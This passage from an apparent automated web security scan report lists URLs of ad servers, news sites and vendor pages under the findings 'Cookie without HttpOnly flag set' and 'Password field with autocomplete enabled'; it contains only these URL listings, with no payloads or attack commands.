11.189. http://u-ads.adap.tv/a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99

11.190. http://usadmm.dotomi.com/dmm/servlet/dmm

11.191. http://vads.adbrite.com/vast/adserver

11.192. http://vlog.leadforce1.com/bf/bf.php

11.193. http://www.att.com/u-verse/availability/

11.194. http://www.bradsdeals.com/dealsoftheday/subscribe/b

11.195. http://www.giganews.com/

11.196. http://www.giganews.com/s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact

11.197. http://www.google.com/sorry/

11.198. http://www.google.com/sorry/Captcha

11.199. http://www.nntpserver.com/gl/

12. Cookie without HttpOnly flag set

12.1. http://ads.adxpose.com/ads/ads.js

12.2. http://afe.specificclick.net/

12.3. http://alerts.4info.com/alert/ads/dispatcher.jsp

12.4. http://alerts.4info.com/alert/ads/fastTrackAlerts.js

12.5. http://blekko.com/a/e

12.6. http://blekko.com/a/favicon

12.7. http://blekko.com/a/track

12.8. http://blekko.com/autocomplete

12.9. http://event.adxpose.com/event.flow

12.10. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

12.11. http://pixel.adsafeprotected.com/jspix

12.12. http://sales.liveperson.net/visitor/addons/deploy.asp

12.13. http://www-304.ibm.com/support/operations/us/en/orderdelivery

12.14. http://www.ibm.com/developerworks/forums/comment.jspa

12.15. http://www.ibm.com/developerworks/utils/ratingJSON.jsp

12.16. http://www.mailjet.com/

12.17. http://www.mailjet.com/pricing

12.18. https://www.mailjet.com/signup

12.19. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/

12.20. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

12.21. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

12.22. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/

12.23. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

12.24. http://www.tmz.com/reset-password/

12.25. http://www.tmz.com/signin/

12.26. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/

12.27. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/

12.28. http://www.toofab.com/category/celeb-couples/

12.29. http://www.toofab.com/news/

12.30. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp

12.31. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp

12.32. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp

12.33. http://27.xg4ken.com/media/redir.php

12.34. http://2912a.v.fwmrm.net/ad/l/1

12.35. http://2912a.v.fwmrm.net/ad/l/1

12.36. http://2912a.v.fwmrm.net/ad/l/1

12.37. http://2912a.v.fwmrm.net/ad/p/1

12.38. http://a.collective-media.net/adj/cm.rev_bostonherald/

12.39. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience

12.40. http://a.collective-media.net/adj/q1.bosherald/be_news

12.41. http://a.collective-media.net/adj/q1.bosherald/ent_fr

12.42. http://a.collective-media.net/adj/q1.bosherald/news

12.43. http://a.collective-media.net/cmadj/cm.rev_bostonherald/

12.44. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience

12.45. http://a.collective-media.net/cmadj/q1.bosherald/be_news

12.46. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr

12.47. http://a.collective-media.net/cmadj/q1.bosherald/news

12.48. http://a.tribalfusion.com/i.cid

12.49. http://a.tribalfusion.com/j.ad

12.50. http://a.tribalfusion.com/z/i.cid

12.51. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.2

12.52. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.3

12.53. http://ad.doubleclick.net/adj/q1.bosherald/be_news

12.54. http://ad.doubleclick.net/adj/q1.bosherald/news

12.55. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups

12.56. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice

12.57. http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk

12.58. http://ad.yieldmanager.com/imp

12.59. http://ad.yieldmanager.com/pixel

12.60. http://ads.lucidmedia.com/clicksense/pixel

12.61. http://adserver.teracent.net/tase/ad

12.62. http://adserver.teracent.net/tase/redir/1316221519820_135153353_as3104_imp/vew

12.63. http://adserver.teracent.net/tase/redir/1316221548433_135109402_as3106_imp/vew

12.64. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php

12.65. http://apis.google.com/js/plusone.js

12.66. http://ar.voicefive.com/b/recruitBeacon.pli

12.67. http://ar.voicefive.com/b/wc_beacon.pli

12.68. http://ar.voicefive.com/bmx3/broker.pli

12.69. http://attuverseoffers.com/tv_hsi_bundles/index.php

12.70. http://b.scorecardresearch.com/b

12.71. http://b.scorecardresearch.com/p

12.72. http://b.scorecardresearch.com/r

12.73. http://b.voicefive.com/b

12.74. http://b.voicefive.com/p

12.75. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2

12.76. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0

12.77. http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx

12.78. http://c.statcounter.com/t.php

12.79. http://cdnt.meteorsolutions.com/api/setid

12.80. http://cdnt.meteorsolutions.com/api/track

12.81. http://cdnt.meteorsolutions.com/api/track

12.82. http://clk.atdmt.com/go/335787632/direct

12.83. http://cpanel.app9.hubspot.com/salog.js.aspx

12.84. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js

12.85. http://d7.zedo.com/img/bh.gif

12.86. http://d7.zedo.com/utils/ecSet.js

12.87. http://dc.tremormedia.com/comp.gif

12.88. http://dc.tremormedia.com/crossdomain.xml

12.89. http://dc.tremormedia.com/st.gif

12.90. http://forums.cpanel.net/calendar.php

12.91. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html

12.92. http://g2.gumgum.com/services/get

12.93. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030885431/

12.94. http://i.w55c.net/a.gif

12.95. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard

12.96. http://image2.pubmatic.com/AdServer/Pug

12.97. http://imp.fetchback.com/serve/fb/adtag.js

12.98. http://imp.fetchback.com/serve/fb/imp

12.99. http://info.mailtraq.com/142/

12.100. http://info.mailtraq.com/716/

12.101. http://info.mailtraq.com/imap

12.102. http://info.mailtraq.com/wac

12.103. http://leadback.advertising.com/adcedge/lb

12.104. http://leadback.advertising.com/adcedge/lb

12.105. http://livechat.iadvize.com/chat_init.js

12.106. http://livechat.iadvize.com/rpc/referrer.php

12.107. http://loadm.exelator.com/load/

12.108. http://log.go.com/log

12.109. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom

12.110. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle

12.111. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1

12.112. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top

12.113. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom

12.114. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle

12.115. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1

12.116. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top

12.117. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01

12.118. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom

12.119. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle

12.120. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top

12.121. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01

12.122. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

12.123. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

12.124. http://odb.outbrain.com/utils/get

12.125. http://omg.yahoo.com/photos/what-were-they-thinking/5203

12.126. http://ping.crowdscience.com/ping.js

12.127. http://q1.checkm8.com/adam/detect

12.128. http://q1.checkm8.com/adam/report

12.129. http://r.turn.com/r/beacon

12.130. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

12.131. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653

12.132. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome

12.133. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work

12.134. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle

12.135. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome

12.136. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome

12.137. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

12.138. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

12.139. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

12.140. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

12.141. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle

12.142. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

12.143. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle

12.144. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle

12.145. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle

12.146. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome

12.147. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome

12.148. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome

12.149. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome

12.150. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1

12.151. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

12.152. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D

12.153. http://receive.inplay.tubemogul.com/StreamReceiver/services

12.154. http://rs.gwallet.com/r1/pixel/x420r2425801

12.155. http://rt.legolas-media.com/lgrt

12.156. http://rt1302.infolinks.com/action/doq.htm

12.157. http://rt1701.infolinks.com/action/doq.htm

12.158. http://rt1702.infolinks.com/action/doq.htm

12.159. http://rt1803.infolinks.com/action/doq.htm

12.160. http://rt1804.infolinks.com/action/doq.htm

12.161. http://rt1901.infolinks.com/action/doq.htm

12.162. http://rt1903.infolinks.com/action/doq.htm

12.163. http://sales.liveperson.net/hc/25199332/

12.164. http://sales.liveperson.net/hc/25199332/

12.165. http://search.yahoo.com/search

12.166. http://sensor2.suitesmart.com/sensor4.js

12.167. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.168. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.169. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.170. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.171. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.172. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.173. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.174. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.175. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.176. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.177. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.178. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.179. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.180. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.181. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.182. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.184. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.185. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.186. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.187. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.188. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.189. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.190. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.191. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.192. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.193. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.194. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.195. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.196. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.197. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.198. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.199. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.200. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.201. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.202. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.203. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.204. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.205. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.206. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.207. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.208. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.209. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.210. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.211. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.212. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.213. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.214. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.215. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.216. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.217. http://tag.admeld.com/ad/iframe/221/tmz/728x90/homepage_btf

12.218. http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782

12.219. http://tag.admeld.com/ad/js/221/tmz/300x250/af-top-right

12.220. http://tag.admeld.com/ad/js/221/tmz/300x250/af-top-right-2

12.221. http://tag.admeld.com/ad/js/221/tmz/300x250/bf-top-right

12.222. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_atf

12.223. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_atf_2

12.224. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_btf_rr

12.225. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_btf_rr_2

12.226. http://tag.admeld.com/ad/js/221/tmz/300x250/homepage_inpost

12.227. http://tag.admeld.com/ad/js/221/tmz/300x250/ros_inpage

12.228. http://tag.admeld.com/ad/js/221/tmz/300x250/toofab_ros

12.229. http://tag.admeld.com/ad/js/221/tmz/728x90/homepage_atf

12.230. http://tag.admeld.com/ad/js/221/tmz/728x90/ros

12.231. http://tag.admeld.com/ad/js/221/tmz/728x90/toofab_ros

12.232. http://tag.admeld.com/ad/js/610/unified/300x250/bh_656864_29757991

12.233. http://tag.admeld.com/match

12.234. http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html

12.235. http://tag.admeld.com/passback/iframe/221/tmz/728x90/6/meld.html

12.236. http://tag.admeld.com/passback/js/221/tmz/300x250/28/meld.js

12.237. http://tag.admeld.com/passback/js/221/tmz/300x250/49/meld.js

12.238. http://tag.admeld.com/passback/js/221/tmz/728x90/28/meld.js

12.239. http://tag.admeld.com/passback/js/221/tmz/728x90/49/meld.js

12.240. http://tag.admeld.com/passback/js/610/unified/300x250/8/meld.js

12.241. http://tag.contextweb.com/TagPublish/GetAd.aspx

12.242. http://tag.contextweb.com/TagPublish/GetAd.aspx

12.243. http://tenzing.fmpub.net/

12.244. http://testdm.travelers.com/trvwics.gif

12.245. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif

12.246. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif

12.247. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif

12.248. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif

12.249. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif

12.250. http://traffic.outbrain.com/network/redir

12.251. http://u-ads.adap.tv/a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==

12.252. http://u-ads.adap.tv/a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99

12.253. http://usadmm.dotomi.com/dmm/servlet/dmm

12.254. http://usenetjunction.com/scripts/track.php

12.255. http://vads.adbrite.com/vast/adserver

12.256. http://vlog.leadforce1.com/bf/bf.php

12.257. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

12.258. http://www.att.com/u-verse/availability/

12.259. http://www.bradsdeals.com/dealsoftheday/subscribe/b

12.260. http://www.elfqrin.com/hacklab/pages/nntpserv.php

12.261. http://www.enstarllc.com/

12.262. http://www.giganews.com/

12.263. http://www.giganews.com/s/google/nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact

12.264. http://www.google.com/sorry/

12.265. http://www.google.com/sorry/Captcha

12.266. http://www.googleadservices.com/pagead/aclk

12.267. http://www.ibm.com/search/csass/search

12.268. http://www.ibm.com/search/csass/search/

12.269. http://www.mailtraq.com/30day

12.270. http://www.nntpserver.com/gl/

12.271. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp

13. Password field with autocomplete enabled

13.1. http://dw1.s81c.com/common/js/dynamicnav.js

13.2. http://forums.cpanel.net/calendar.php

13.3. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html

13.4. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html

13.5. http://jcp.org/en/jsr/all

13.6. http://www.actvalue.com/

13.7. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp

13.8. http://www.easynews.com/

13.9. http://www.easynews.com/whyeasynews.html

13.10. https://www.easynews.com/signup/

13.11. http://www.giganews.com/

13.12. https://www.giganews.com/signup/

13.13. https://www.giganews.com/signup/billing.html

13.14. http://www.ibm.com/common/js/dynamicnav.js

13.15. http://www.ibm.com/developerworks/java/

13.16. http://www.ibm.com/developerworks/java/find/standards/

13.17. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html

13.18. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html

13.19. http://www.ibm.com/developerworks/tivoli/library/s-csscript/

